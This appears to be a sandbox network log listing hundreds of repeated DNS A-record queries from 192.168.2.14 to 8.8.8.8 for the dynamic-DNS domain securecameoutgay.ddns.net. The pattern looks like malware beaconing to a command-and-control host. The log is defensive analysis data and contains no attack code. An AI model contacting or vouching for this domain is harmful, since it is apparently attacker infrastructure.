                                                    Oct 12, 2024 23:05:24.907963037 CEST192.168.2.148.8.8.80xd559Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.914076090 CEST192.168.2.148.8.8.80x3b8eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.920391083 CEST192.168.2.148.8.8.80x3b8eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.927310944 CEST192.168.2.148.8.8.80x3b8eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.934068918 CEST192.168.2.148.8.8.80x3b8eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.941231966 CEST192.168.2.148.8.8.80x3b8eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.948077917 CEST192.168.2.148.8.8.80xa8fbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.954699039 CEST192.168.2.148.8.8.80xa8fbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.961087942 CEST192.168.2.148.8.8.80xa8fbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.967869997 CEST192.168.2.148.8.8.80xa8fbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.974216938 CEST192.168.2.148.8.8.80xa8fbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.980648994 CEST192.168.2.148.8.8.80x371bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.987535000 CEST192.168.2.148.8.8.80x371bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.994040012 CEST192.168.2.148.8.8.80x371bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.001823902 CEST192.168.2.148.8.8.80x371bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.009450912 CEST192.168.2.148.8.8.80x371bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.017151117 CEST192.168.2.148.8.8.80x8cb6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.025484085 CEST192.168.2.148.8.8.80x8cb6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.033325911 CEST192.168.2.148.8.8.80x8cb6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.040617943 CEST192.168.2.148.8.8.80x8cb6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.047103882 CEST192.168.2.148.8.8.80x8cb6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.053333044 CEST192.168.2.148.8.8.80x1123Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.060945988 CEST192.168.2.148.8.8.80x1123Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.068583012 CEST192.168.2.148.8.8.80x1123Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.076431036 CEST192.168.2.148.8.8.80x1123Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.084089041 CEST192.168.2.148.8.8.80x1123Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.091659069 CEST192.168.2.148.8.8.80x382fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.100064039 CEST192.168.2.148.8.8.80x382fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.107896090 CEST192.168.2.148.8.8.80x382fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.115504980 CEST192.168.2.148.8.8.80x382fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.124377012 CEST192.168.2.148.8.8.80x382fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.132129908 CEST192.168.2.148.8.8.80xc5fbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.141735077 CEST192.168.2.148.8.8.80xc5fbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.148139000 CEST192.168.2.148.8.8.80xc5fbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.156316042 CEST192.168.2.148.8.8.80xc5fbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.163248062 CEST192.168.2.148.8.8.80xc5fbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.172408104 CEST192.168.2.148.8.8.80x5e48Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.180531979 CEST192.168.2.148.8.8.80x5e48Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.188704967 CEST192.168.2.148.8.8.80x5e48Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.196691036 CEST192.168.2.148.8.8.80x5e48Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.204890013 CEST192.168.2.148.8.8.80x5e48Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.213855982 CEST192.168.2.148.8.8.80xcf1aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.222104073 CEST192.168.2.148.8.8.80xcf1aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.230169058 CEST192.168.2.148.8.8.80xcf1aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.238101006 CEST192.168.2.148.8.8.80xcf1aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.246572971 CEST192.168.2.148.8.8.80xcf1aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.254877090 CEST192.168.2.148.8.8.80xc661Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.263751030 CEST192.168.2.148.8.8.80xc661Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.270665884 CEST192.168.2.148.8.8.80xc661Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.278358936 CEST192.168.2.148.8.8.80xc661Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.284812927 CEST192.168.2.148.8.8.80xc661Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.291455030 CEST192.168.2.148.8.8.80xfe35Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.298031092 CEST192.168.2.148.8.8.80xfe35Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.304872990 CEST192.168.2.148.8.8.80xfe35Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.311551094 CEST192.168.2.148.8.8.80xfe35Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.318135023 CEST192.168.2.148.8.8.80xfe35Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.324635983 CEST192.168.2.148.8.8.80xe7a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.332012892 CEST192.168.2.148.8.8.80xe7a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.338536978 CEST192.168.2.148.8.8.80xe7a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.347460032 CEST192.168.2.148.8.8.80xe7a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.354460955 CEST192.168.2.148.8.8.80xe7a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.360785007 CEST192.168.2.148.8.8.80x3db6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.368119955 CEST192.168.2.148.8.8.80x3db6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.374816895 CEST192.168.2.148.8.8.80x3db6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.382112980 CEST192.168.2.148.8.8.80x3db6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.388840914 CEST192.168.2.148.8.8.80x3db6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.395476103 CEST192.168.2.148.8.8.80xc06eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.402219057 CEST192.168.2.148.8.8.80xc06eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.409092903 CEST192.168.2.148.8.8.80xc06eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.415694952 CEST192.168.2.148.8.8.80xc06eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.422360897 CEST192.168.2.148.8.8.80xc06eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.429261923 CEST192.168.2.148.8.8.80xd0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.435839891 CEST192.168.2.148.8.8.80xd0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.442636967 CEST192.168.2.148.8.8.80xd0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.449413061 CEST192.168.2.148.8.8.80xd0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.456212997 CEST192.168.2.148.8.8.80xd0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.463156939 CEST192.168.2.148.8.8.80x3a7aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.469822884 CEST192.168.2.148.8.8.80x3a7aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.476228952 CEST192.168.2.148.8.8.80x3a7aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.482831001 CEST192.168.2.148.8.8.80x3a7aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.489221096 CEST192.168.2.148.8.8.80x3a7aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.495953083 CEST192.168.2.148.8.8.80x616eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.503808975 CEST192.168.2.148.8.8.80x616eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.510807037 CEST192.168.2.148.8.8.80x616eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.517894983 CEST192.168.2.148.8.8.80x616eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.524607897 CEST192.168.2.148.8.8.80x616eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.531228065 CEST192.168.2.148.8.8.80xcfddStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.538163900 CEST192.168.2.148.8.8.80xcfddStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.545361996 CEST192.168.2.148.8.8.80xcfddStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.552582979 CEST192.168.2.148.8.8.80xcfddStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.559567928 CEST192.168.2.148.8.8.80xcfddStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.566476107 CEST192.168.2.148.8.8.80x8978Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.573321104 CEST192.168.2.148.8.8.80x8978Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.579838991 CEST192.168.2.148.8.8.80x8978Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.586610079 CEST192.168.2.148.8.8.80x8978Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.593101978 CEST192.168.2.148.8.8.80x8978Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.599701881 CEST192.168.2.148.8.8.80x54b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.606312037 CEST192.168.2.148.8.8.80x54b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.612669945 CEST192.168.2.148.8.8.80x54b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.620820999 CEST192.168.2.148.8.8.80x54b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.627140999 CEST192.168.2.148.8.8.80x54b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.634135008 CEST192.168.2.148.8.8.80x1251Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.640963078 CEST192.168.2.148.8.8.80x1251Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.647737026 CEST192.168.2.148.8.8.80x1251Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.654614925 CEST192.168.2.148.8.8.80x1251Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.661232948 CEST192.168.2.148.8.8.80x1251Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.668040991 CEST192.168.2.148.8.8.80xced7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.675282001 CEST192.168.2.148.8.8.80xced7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.682122946 CEST192.168.2.148.8.8.80xced7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.689146996 CEST192.168.2.148.8.8.80xced7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.696000099 CEST192.168.2.148.8.8.80xced7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.702735901 CEST192.168.2.148.8.8.80x23e3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.709441900 CEST192.168.2.148.8.8.80x23e3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.716352940 CEST192.168.2.148.8.8.80x23e3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.723479986 CEST192.168.2.148.8.8.80x23e3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.730392933 CEST192.168.2.148.8.8.80x23e3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.736896038 CEST192.168.2.148.8.8.80x61f9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.743567944 CEST192.168.2.148.8.8.80x61f9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.750232935 CEST192.168.2.148.8.8.80x61f9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.757083893 CEST192.168.2.148.8.8.80x61f9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.763672113 CEST192.168.2.148.8.8.80x61f9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.771783113 CEST192.168.2.148.8.8.80x939dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.778573036 CEST192.168.2.148.8.8.80x939dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.784843922 CEST192.168.2.148.8.8.80x939dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.791498899 CEST192.168.2.148.8.8.80x939dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.798105955 CEST192.168.2.148.8.8.80x939dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.804531097 CEST192.168.2.148.8.8.80x9997Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.811332941 CEST192.168.2.148.8.8.80x9997Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.817955971 CEST192.168.2.148.8.8.80x9997Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.824784994 CEST192.168.2.148.8.8.80x9997Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.831854105 CEST192.168.2.148.8.8.80x9997Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.838752985 CEST192.168.2.148.8.8.80x2d11Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.845244884 CEST192.168.2.148.8.8.80x2d11Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.852241993 CEST192.168.2.148.8.8.80x2d11Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.859200954 CEST192.168.2.148.8.8.80x2d11Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.866142035 CEST192.168.2.148.8.8.80x2d11Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.872951984 CEST192.168.2.148.8.8.80x3e60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.879333019 CEST192.168.2.148.8.8.80x3e60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.885675907 CEST192.168.2.148.8.8.80x3e60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.892131090 CEST192.168.2.148.8.8.80x3e60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.898716927 CEST192.168.2.148.8.8.80x3e60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.905329943 CEST192.168.2.148.8.8.80xef10Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.911823034 CEST192.168.2.148.8.8.80xef10Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.918361902 CEST192.168.2.148.8.8.80xef10Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.924941063 CEST192.168.2.148.8.8.80xef10Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.931499004 CEST192.168.2.148.8.8.80xef10Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.938807011 CEST192.168.2.148.8.8.80x1f52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.945544004 CEST192.168.2.148.8.8.80x1f52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.951987982 CEST192.168.2.148.8.8.80x1f52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.958508015 CEST192.168.2.148.8.8.80x1f52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.965656042 CEST192.168.2.148.8.8.80x1f52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.972217083 CEST192.168.2.148.8.8.80xcc62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.978648901 CEST192.168.2.148.8.8.80xcc62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.984921932 CEST192.168.2.148.8.8.80xcc62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.991540909 CEST192.168.2.148.8.8.80xcc62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:25.997976065 CEST192.168.2.148.8.8.80xcc62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.004657984 CEST192.168.2.148.8.8.80xcf16Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.010880947 CEST192.168.2.148.8.8.80xcf16Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.017452955 CEST192.168.2.148.8.8.80xcf16Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.025968075 CEST192.168.2.148.8.8.80xcf16Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.032747984 CEST192.168.2.148.8.8.80xcf16Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.039608002 CEST192.168.2.148.8.8.80xcf5bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.045860052 CEST192.168.2.148.8.8.80xcf5bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.052436113 CEST192.168.2.148.8.8.80xcf5bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.059309959 CEST192.168.2.148.8.8.80xcf5bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.066405058 CEST192.168.2.148.8.8.80xcf5bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.073906898 CEST192.168.2.148.8.8.80xb232Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.080859900 CEST192.168.2.148.8.8.80xb232Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.087744951 CEST192.168.2.148.8.8.80xb232Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.095151901 CEST192.168.2.148.8.8.80xb232Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.102166891 CEST192.168.2.148.8.8.80xb232Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.108866930 CEST192.168.2.148.8.8.80xbfc0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.115952969 CEST192.168.2.148.8.8.80xbfc0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.122544050 CEST192.168.2.148.8.8.80xbfc0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.129050016 CEST192.168.2.148.8.8.80xbfc0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.135929108 CEST192.168.2.148.8.8.80xbfc0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.142225027 CEST192.168.2.148.8.8.80x93edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.148963928 CEST192.168.2.148.8.8.80x93edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.155972004 CEST192.168.2.148.8.8.80x93edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.162558079 CEST192.168.2.148.8.8.80x93edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.169158936 CEST192.168.2.148.8.8.80x93edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.175749063 CEST192.168.2.148.8.8.80xb21dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.182970047 CEST192.168.2.148.8.8.80xb21dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.190320969 CEST192.168.2.148.8.8.80xb21dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.199611902 CEST192.168.2.148.8.8.80xb21dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.209228992 CEST192.168.2.148.8.8.80xb21dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.216397047 CEST192.168.2.148.8.8.80xe977Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
